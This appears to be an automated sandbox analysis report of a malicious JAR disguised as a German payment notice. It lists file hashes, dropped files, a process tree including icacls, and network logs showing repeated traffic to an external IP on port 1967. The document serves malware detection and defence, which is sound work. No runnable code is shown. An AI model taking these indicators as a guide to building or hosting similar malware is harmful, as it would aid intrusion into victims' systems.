SSDEEP: | 24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6 |
MD5: | ACFB5B5FD9EE10BF69497792FD469F85 |
SHA1: | 0E0845217C4907822403912AD6828D8E0B256208 |
SHA-256: | B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E |
SHA-512: | E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2681931 |
Entropy (8bit): | 5.90068240083877 |
Encrypted: | false |
SSDEEP: | 24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8 |
MD5: | 2F4A99C2758E72EE2B59A73586A2322F |
SHA1: | AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF |
SHA-256: | 24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5 |
SHA-512: | B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 238200 |
Entropy (8bit): | 6.633830240784974 |
Encrypted: | false |
SSDEEP: | 6144:2ypwv+96lffpB7TrNvEMAR8sKq9dMJE6K0p+aA5J3VUfXw:XlU5RBvrNMM8RbD7T6w |
MD5: | 75A586728AA168951B1C48F28F34C553 |
SHA1: | 4E150E7CBFFA43FB120876221343AF15B3332049 |
SHA-256: | 9C2A20B67EDE0CC57EB3E3708EAD52D98AD6065D5A539319D771846ACFAC6A75 |
SHA-512: | 586AFF19E18C0B30C9E3AA859C3DC028C2472625E98EF7C46E023118CE518CEA149F4A8FE45DC3D43ABA2E2E8A9FAEB9EF34C25FA5B745E5FA294BBCDDE04851 |
Malicious: | false |
Yara Hits: |
|
Antivirus: |
|
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4322173 |
Entropy (8bit): | 7.994785882289737 |
Encrypted: | true |
SSDEEP: | 98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa |
MD5: | B33387E15AB150A7BF560ABDC73C3BEC |
SHA1: | 66B8075784131F578EF893FD7674273F709B9A4C |
SHA-256: | 2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491 |
SHA-512: | 25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 791222 |
Entropy (8bit): | 7.998588520286719 |
Encrypted: | true |
SSDEEP: | 24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t |
MD5: | E1AA38A1E78A76A6DE73EFAE136CDB3A |
SHA1: | C463DA71871F780B2E2E5DBA115D43953B537DAF |
SHA-256: | 2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609 |
SHA-512: | FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1252711 |
Entropy (8bit): | 5.880198419513214 |
Encrypted: | false |
SSDEEP: | 24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp |
MD5: | D87EC90703E5CA1D19D16A2B571A01D4 |
SHA1: | 0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC |
SHA-256: | 76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF |
SHA-512: | DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1 |
Malicious: | false |
Antivirus: |
|
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1252711 |
Entropy (8bit): | 5.880198419513214 |
Encrypted: | false |
SSDEEP: | 24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp |
MD5: | D87EC90703E5CA1D19D16A2B571A01D4 |
SHA1: | 0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC |
SHA-256: | 76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF |
SHA-512: | DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1 |
Malicious: | false |
Antivirus: |
|
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12898 |
Entropy (8bit): | 7.93277955179482 |
Encrypted: | false |
SSDEEP: | 192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv |
MD5: | 5B6CEE019A5BCD56303094BB15787AAC |
SHA1: | DFE538F5DCD7910B86F50EADD502810D2A6BDDAB |
SHA-256: | A2AF2C47293272C35DDF0A3187F190E1235E7413CF076C8A8B651EE9162DFEBD |
SHA-512: | E729A6BB2A19FD4E18CF6AC4C5444452552594072EFB943283EA1F75A095D8F3304C466697A712D7DE9A7C8AFA387C2C07CB2824D4F0BA1FBA96FC003253C00E |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 45 |
Entropy (8bit): | 0.9111711733157262 |
Encrypted: | false |
SSDEEP: | 3:/lwlt7n:WNn |
MD5: | C8366AE350E7019AEFC9D1E6E6A498C6 |
SHA1: | 5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61 |
SHA-256: | 11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238 |
SHA-512: | 33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8870 |
Entropy (8bit): | 6.015040608113816 |
Encrypted: | false |
SSDEEP: | 96:3MbgmlLF2cpcJ2TYe3YWx4BX/euTlAWhA3wD6shIvgZ9Li1Q8ojJn7:3sgmNYciYZxxWTlAMzhIv4h3Rp7 |
MD5: | 01FEA3AC89581EAAF285D15AA0208E7C |
SHA1: | DA711D18D81D63D7DE15037B0E480E1A9EA745A9 |
SHA-256: | 838ED717B79448059E07EA419727C7235A543BBBECA5C116F36ADE6234E59DB0 |
SHA-512: | B7BA0F5BDB9F84DCD61B79B0B949FB6663969A356E6718C06FBA1CADB20C9FDA3B22AEEF95D1AFF56ECD7FE227299B2E3D0D11A9A6915D17CA9C0E506C0F7D66 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8618 |
Entropy (8bit): | 6.0088017909748235 |
Encrypted: | false |
SSDEEP: | 192:DAvI31xZ2jYlZzRxz0hdsRgi1+mOZPzT3ID61CzA:J2kLRxz0hORgirm3o60U |
MD5: | A4E70FF4D1899402F51C29743B3C85F2 |
SHA1: | CA6F6FCD695385C684250C43F9AA648C5504288F |
SHA-256: | 462EC1868551085AFB72BB4713FC5DA73EB5427154D4E59E2EA041AF80393BA3 |
SHA-512: | E763D90639559543330E89A4A3B9574DA28D6810C2572E4F9B898DCF3998ACA78710A36E82F6060E1B450FC6E911F21F21A3D2698A570AF784FFD40C6B9378C1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 765 |
Entropy (8bit): | 5.1548602300807405 |
Encrypted: | false |
SSDEEP: | 12:Uv+RfxMoSC8s0P6e+/g+iudd0ulPso7kqNUUofSjOf8E7oNV/NhkZEgU/zh1itlV:2+ZqoZ90P6J/gId+ulj71U7BD76VvnLs |
MD5: | 3567EECA2D2544FF819D55313C65C039 |
SHA1: | A73B81C80B2E5DC4138B0E88A3F46EBEDDBB465F |
SHA-256: | 2DFD9FC15E4F55CD1349118CED981AAF181EA8ACE63FC460F5A7ED3F5E8CBA13 |
SHA-512: | CDC211B1CE190B25BCD40204DF9B557F32D3C347FBCCFE38624804FF9D46D7D1979A5CD8AA9D22C0C632EFD0ACEE24FDEBFF8DCD6BECF7DA3AE49CF3457BD6A7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1639 |
Entropy (8bit): | 5.454765167988992 |
Encrypted: | false |
SSDEEP: | 48:KAXQ38VTN20Prvlea1sIl+sx2vp/lo4nyn:S+ZYAlsh/lwn |
MD5: | 39D4A1BF0606FB64F1BED662E6448293 |
SHA1: | 686AA7CE9BFD0167DB661D45206740428EB5B118 |
SHA-256: | 81A44B356D369D87D26D16988793EF41C8C1C34B3914C3B7EADA96BB075F1113 |
SHA-512: | D875093EC1995D195B72352E8509C085FC54B7D46FAB7A8FD662D07C08917BF5C98AB54AF005F1D456CA039341D45D236F47B13301F3A4E14654A80A442F4EF0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 91 |
Entropy (8bit): | 4.946111849666226 |
Encrypted: | false |
SSDEEP: | 3:ZLCAWIzBExR8UpLVc3sRgmMgX84oxXbEDCta:1KItMFpL6sRwuoxXbXa |
MD5: | 3FB263055B3F7EED14DE15F2C21958B2 |
SHA1: | 2D341C2A4AE64A8503F359479E38E093B4605046 |
SHA-256: | 01A11E2B9BB27F0586017ECFBA7E40D71150F61830317AA0395D7A60704C8B7D |
SHA-512: | 0033B60BAD32ED6545E17477F815B8046CEB2E3D82BBB27780F6A60F0429DF1054CFBCF814B59DDBECCC8102B5F326D766028E54E41B35E048B825294B6E1BBE |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\PING.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.728014748542534 |
Encrypted: | false |
SSDEEP: | 12:P95pTcgTcgTcgTcgTcgTLs4oR7n+AFSkIrxMVlmJHaVzvv:PNURD+AokItULVDv |
MD5: | 1A20F9D48A90568E8726C71FE7C9D490 |
SHA1: | 3DBCB62DCFA0588D85A7A1ED71D5EED10AF82E2E |
SHA-256: | 79C8CE0C4209CCEB04EC136DEF7AA546936D288D680A15F4469352CE865A54C0 |
SHA-512: | B362A048BDCC201530C8132CEB05526BB891AF3B7CC4819AA9ABDAFEF096F598064F01BC91C24AF0348AB753F238BD698FAAC644D623E19C05BE6A66E7801794 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.93277955179482 |
TrID: |
|
File name: | Avisierung vom 03.04.2025 Kundennummer 1084472.jar |
File size: | 12'898 bytes |
MD5: | 5b6cee019a5bcd56303094bb15787aac |
SHA1: | dfe538f5dcd7910b86f50eadd502810d2a6bddab |
SHA256: | a2af2c47293272c35ddf0a3187f190e1235e7413cf076c8a8b651ee9162dfebd |
SHA512: | e729a6bb2a19fd4e18cf6ac4c5444452552594072efb943283ea1f75a095d8f3304c466697a712d7de9a7c8afa387c2c07cb2824d4f0ba1fba96fc003253c00e |
SSDEEP: | 192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv |
TLSH: | 4842BF812B60471AFA53213B43C48407FE5D059AA50C62A773C7B9A53A30D85AFE77EF |
File Content Preview: | PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.M..LK-...K-*....R0.3..r.JM,IM.u...X....[.*h..%&..*8.....%...k.r.&f..:.$..[)8G.x{....r.r..PK.....rZ...[...PK...........Z................G.class. |
Icon Hash: | d08c8e8ea2868a54 |
- Total Packets: 41
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 4, 2025 07:00:13.334759951 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:13.511122942 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:13.511214018 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:18.908715963 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.010140896 CEST | 80 | 49717 | 208.95.112.1 | 192.168.2.4 |
Apr 4, 2025 07:00:19.010325909 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.010659933 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.115631104 CEST | 80 | 49717 | 208.95.112.1 | 192.168.2.4 |
Apr 4, 2025 07:00:19.115827084 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.117383957 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.217335939 CEST | 80 | 49717 | 208.95.112.1 | 192.168.2.4 |
Apr 4, 2025 07:00:20.777646065 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:21.007424116 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:21.007494926 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:21.223809004 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.386948109 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.386986971 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.387013912 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.387032986 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.387115002 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:22.387115955 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:22.763606071 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:22.992410898 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.992486954 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.056888103 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057171106 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057212114 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057239056 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057318926 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057401896 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057451963 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057662010 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057702065 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057713985 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057742119 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057756901 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057781935 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057797909 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057821035 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057827950 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057859898 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057873964 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057900906 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057914972 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057940006 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057949066 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057977915 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057997942 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.058022022 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.210450888 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.236756086 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.236798048 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.236870050 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237049103 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237147093 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237184048 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237205029 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237221956 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237261057 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237273932 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237363100 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237420082 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237638950 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237678051 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237734079 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237740040 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237778902 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237826109 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238121033 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238188028 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238226891 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238234997 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238332987 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238392115 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238399029 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238440037 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238482952 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238563061 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238603115 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238646984 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238704920 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238743067 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238779068 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238786936 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238816023 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238862991 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.413752079 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413836956 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413873911 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413913965 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413923025 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.413950920 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413992882 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.414124012 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414160967 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414181948 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.414207935 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414244890 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414258003 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.414350033 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 4, 2025 07:00:08.643171072 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:09.651026964 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:10.663887024 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:12.679073095 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:18.801630974 CEST | 192.168.2.4 | 1.1.1.1 | 0xc924 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 4, 2025 07:00:13.265022993 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:13.265078068 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:13.265160084 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:13.265196085 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:18.900382042 CEST | 1.1.1.1 | 192.168.2.4 | 0xc924 | No error (0) | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Target ID: | 1 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\7za.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xac0000 |
File size: | 289'792 bytes |
MD5 hash: | 77E556CDFDC5C592F5C46DB4127C6F4C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xcc0000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 01:00:08 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\icacls.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2f0000 |
File size: | 29'696 bytes |
MD5 hash: | 2E49585E4E08565F52090B144062F97E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 01:00:08 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 01:00:22 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 01:00:22 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 15 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
